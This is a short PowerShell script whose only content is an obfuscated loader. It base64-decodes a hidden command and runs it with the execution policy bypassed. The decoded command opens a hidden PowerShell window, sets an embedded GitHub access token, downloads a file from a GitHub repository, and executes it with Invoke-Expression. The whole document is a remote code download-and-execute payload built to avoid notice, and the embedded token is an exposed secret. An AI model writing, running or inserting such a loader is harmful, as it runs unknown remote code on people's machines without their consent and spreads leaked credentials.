$c = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuIC1Db21tYW5kICIkdG9rZW4gPSAnZ2hwX1ZaNTE3RHp5bHUybG9VTzFZRXdGTm9adUwyaktnUjJYZFNjaic7ICRoZWFkZXJzID0gQHtBdXRob3JpemF0aW9uID0gJ3Rva2VuICcgKyAkdG9rZW59OyAkcmVzcHAgPSBJbnZva2UtUmVzdE1ldGhvZCAtVXJpICdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcGhhdHRhcmFrb3JueWluZGVlLWJlZXAvc2V0dGluZy1kZWs3MC1DT0RFL3JlZnMvaGVhZHMvbWFpbi9zZXR0aW5nLWRlazcwLUNPREUnIC1IZWFkZXJzICRoZWFkZXJzOyBJbnZva2UtRXhwcmVzc2lvbiAkcmVzcHAi"
$b = [System.Convert]::FromBase64String($c)
$code = [System.Text.Encoding]::UTF8.GetString($b)

powershell -NoProfile -ExecutionPolicy Bypass -Command "$code"
